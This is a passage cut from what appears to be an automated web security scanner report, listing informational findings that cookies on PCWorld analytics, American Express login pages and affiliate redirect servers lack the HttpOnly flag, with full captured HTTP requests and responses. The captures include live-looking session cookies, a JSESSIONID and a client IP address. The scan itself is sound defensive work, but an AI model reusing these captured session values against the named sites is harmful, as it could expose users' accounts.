Expires: Sat, 23 Apr 2011 18:49:50 GMT
Last-Modified: Mon, 25 Apr 2011 18:49:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www72
Content-Length: 0
Content-Type: text/plain


18.357. http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omni.pcworld.com
Path:   /b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951?AQB=1&ndh=1&t=24/3/2011%2014%3A44%3A42%200%20300&ns=pcworldcommunication&pageName=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&g=http%3A//www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html&cc=USD&ch=news&c1=source%3Acomputerworld&v1=source%3Acomputerworld&h1=news%7Earticle%7Eidentity%20theft%20monitoring%20services%20called%20%27waste%27&c2=content%20type%3Anews&v2=content%20type%3Anews&c3=display%20type%3Aarticle&v3=display%20type%3Aarticle&h5=PCW%7ETopics%7EConsumer%20Advice&c9=category%3Apcworld%3Aconsumer%20advice&v9=category%3Apcworld%3Aconsumer%20advice&c11=published%3A30-jul-08&v11=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&c12=aid%3A149142&v12=news&c14=author%3Ajaikumar%20vijayan&v14=author%3Ajaikumar%20vijayan&c15=page%3A1&v15=page%3A1&c16=Data%20Not%20Available&v16=Data%20Not%20Available&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c20=Data%20Not%20Available&v20=Data%20Not%20Available&c24=login%3Anot%20logged%20in&v24=login%3Anot%20logged%20in&c25=editorial%20content&v25=editorial%20content&c37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&v37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: omni.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674281645; s_sess=%20s_cc%3Dtrue%3B

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 19:50:52 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA3F8E051D35B4-400001066004C979[CE]; Expires=Fri, 22 Apr 2016 19:50:52 GMT; Domain=.pcworld.com; Path=/
Location: http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951?AQB=1&pccr=true&vidn=26DA3F8E051D35B4-400001066004C979&&ndh=1&t=24/3/2011%2014%3A44%3A42%200%20300&ns=pcworldcommunication&pageName=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&g=http%3A//www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html&cc=USD&ch=news&c1=source%3Acomputerworld&v1=source%3Acomputerworld&h1=news%7Earticle%7Eidentity%20theft%20monitoring%20services%20called%20%27waste%27&c2=content%20type%3Anews&v2=content%20type%3Anews&c3=display%20type%3Aarticle&v3=display%20type%3Aarticle&h5=PCW%7ETopics%7EConsumer%20Advice&c9=category%3Apcworld%3Aconsumer%20advice&v9=category%3Apcworld%3Aconsumer%20advice&c11=published%3A30-jul-08&v11=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&c12=aid%3A149142&v12=news&c14=author%3Ajaikumar%20vijayan&v14=author%3Ajaikumar%20vijayan&c15=page%3A1&v15=page%3A1&c16=Data%20Not%20Available&v16=Data%20Not%20Available&c17=Data%20Not%20Available&v17=Data%20Not%20Available&c20=Data%20Not%20Available&v20=Data%20Not%20Available&c24=login%3Anot%20logged%20in&v24=login%3Anot%20logged%20in&c25=editorial%20content&v25=editorial%20content&c37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&v37=news%3Aconsumer%20advice%3Aarticle%3Aidentity%20theft%20monitoring%20services%20called%20%27waste%27%3A149142&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:50:52 GMT
Last-Modified: Mon, 25 Apr 2011 19:50:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www51
Content-Length: 0
Content-Type: text/plain


18.358. https://online.americanexpress.com/myca/acctsumm/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/acctsumm/us/action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&us_nu=logincontrol&inav=menu_myacct_acctsum HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=655231498.58148.0000

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:50:13 GMT
Server: IBM_HTTP_Server
Location: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_myacct_acctsum
Content-Length: 0
Set-Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1a645525d5f4f58455e445a4a42861c;Version=1;path=/
Cache-Control: no-cache,no-store
Expires: 0
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
Content-Type: text/plain
Content-Language: en-US
Set-Cookie: sroute=621677066.58148.0000; path=/


18.359. https://online.americanexpress.com/myca/logon/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fwww99.americanexpress.com%2Fmyca%2Fusermgt%2Fus%2Faction%3Frequest_type%3Dauthreg_PPLogin%26Face%3Den_US%26lgnsrc%3DPP%26REDIRECT_URL%3Dhttps%3A%2F%2Fwww152.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenroll.do%3FSC%3D%26Face%3Den_US&Face=en_US HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: http://landing.americanexpress.com/v2.php?type=v2&gclid=CNqttZH1tagCFQbe4AodEirYCA&
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:45 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Expires: Sun, 24 Apr 2011 20:27:45 GMT
LastModified: Sun, 24 Apr 2011 20:27:45 GMT
Set-Cookie: NSC_nf3-x-vt-mphpo-c=ffffffff97a3d0fb45525d5f4f58455e445a4a4299f9;Version=1;path=/
Keep-Alive: timeout=15, max=31
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Set-Cookie: sroute=957221386.58148.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 39093

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

18.360. https://online.americanexpress.com/myca/shared/summary/UMS/images/us/generic.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/shared/summary/UMS/images/us/generic.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /myca/shared/summary/UMS/images/us/generic.jpg HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=81294+a%3Dbc58b4f6d9f9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; JSESSIONID=0000z5WV0GvXASukTy2upqG-lc0:14ia6c7a4; MATFSI=IPCFSI::true~BBV::~; NSC_nf3-x-vt-pdbsfhx0-b=ffffffff97a3d0fb45525d5f4f58455e445a4a42be8b; sroute=655231498.58660.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:54:09 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 15 Sep 2009 10:36:03 GMT
Accept-Ranges: bytes
Content-Length: 22023
Cache-Control: max-age=864000, private, must-revalidate
Keep-Alive: timeout=15, max=17
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: sroute=705563146.47873.0000; path=/

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################......%....
...[SNIP]...

18.361. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390?AQB=1&pccr=true&&ndh=1&t=24/3/2011%2014%3A44%3A19%200%20300&ce=UTF-8&pageName=Dialogue%20Welcome%20Page%3AWWMK10058753MP%3A7054579%3A8834744%3A9&g=http%3A//www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp%3Fp_ext%3DY%26p_dlg_id%3D8834744%26src%3D7054579%26Act%3D9%26sckw%3DWWMK10058753MPP001.GCM.8100.110&r=http%3A//www.oracle.com/pls/www/go.lp%3Fkw%3D%26Src%3D7054579%26Act%3D9%26SC%3Dsckw%3DWWMK10058753MPP001.GCM.8100.110&cc=USD&ch=Landing%20Pads&events=event1%2Cevent6&v1=WWMK10058753MP%3A7054579%3A8834744%3A9&v6=WWMK10058753MPP001.GCM.8100.110&v7=WWMK10058753MPP001.GCM.8100.110%3A%20Dialogue%20Welcome%20Page%3AWWMK10058753MP%3A7054579%3A8834744%3A9&c20=New&v20=New&v26=Landing%20Pads&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4DB47D87[CE]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:01 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EFC8515AF33-60000180E01EF56C|4DB47D87[CE]; Expires=Fri, 22 Apr 2016 19:46:01 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|26DA3EFC8515AF33-60000180E01EF56E|4DB47D87[CE]; Expires=Fri, 22 Apr 2016 19:46:01 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:46:01 GMT
Last-Modified: Mon, 25 Apr 2011 19:46:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DB47DF9-5E44-2EC783FC"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www407
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

18.362. http://partners.nextadnetwork.com/z/111/CD76/&dp=80  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/111/CD76/&dp=80

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/111/CD76/&dp=80 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 19:46:26 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 19:46:26 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 19:46:26 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 19:46:26 GMT; path=/; domain=.directtrack.com
Location: http://www.experiandirect.com/triplealert/default.aspx?sc=668715
X-Server-Name: www@dc1dtweb59
Content-Length: 0
Content-Type: text/html


18.363. http://partners.nextadnetwork.com/z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:10:06 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:10:06 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:06 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:06 GMT; path=/; domain=.directtrack.com
Location: http://www.kqzyfj.com/click-1911961-10751987?sid=gid9a identity theft resource_ordering34--2011-04-23--20-10-04CD1&url=https%3A%2F%2Fwww.econsumer.equifax.com%2Fconsumer%2Flanding.ehtml%3F%255estart%3D%26companyName%3Dcj_esnp3r
X-Server-Name: www@dc1dtweb16
Content-Length: 0
Content-Type: text/html


18.364. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/371/CD1/id4+106163471 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:50 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb107
Content-Length: 477
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 106163471CD1&c2=CD1">
<script type="text/javascript">function redirect() {if(doc
...[SNIP]...

18.365. http://partners.nextadnetwork.com/z/406/CD76  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/406/CD76

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/406/CD76 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 19:46:28 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 19:46:28 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 19:46:28 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 19:46:28 GMT; path=/; domain=.directtrack.com
Location: http://affiliate.idgtracker.com/rd/r.php?sid=58&pub=300009&c1=CD76
X-Server-Name: www@dc1dtweb178
Content-Length: 0
Content-Type: text/html


18.366. http://partners.nextadnetwork.com/z/45/CD1/cct+na_crm_free_credit_score_review--2011-04-24--13-44-27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/45/CD1/cct+na_crm_free_credit_score_review--2011-04-24--13-44-27

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/45/CD1/cct+na_crm_free_credit_score_review--2011-04-24--13-44-27 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 20:44:29 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 20:44:29 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 20:44:29 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 20:44:29 GMT; path=/; domain=.directtrack.com
Location: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
X-Server-Name: www@dc1dtweb195
Content-Length: 0
Content-Type: text/html


18.367. http://partners.nextadnetwork.com/z/48/CD1/945440258  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/48/CD1/945440258

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/48/CD1/945440258 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:09:57 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:57 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:57 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:57 GMT; path=/; domain=.directtrack.com
Location: https://secure.lifelock.com/enrollmentform.aspx?promocode=next&uid=945440258CD1
X-Server-Name: www@dc1dtweb168
Content-Length: 0
Content-Type: text/html


18.368. http://partners.nextadnetwork.com/z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
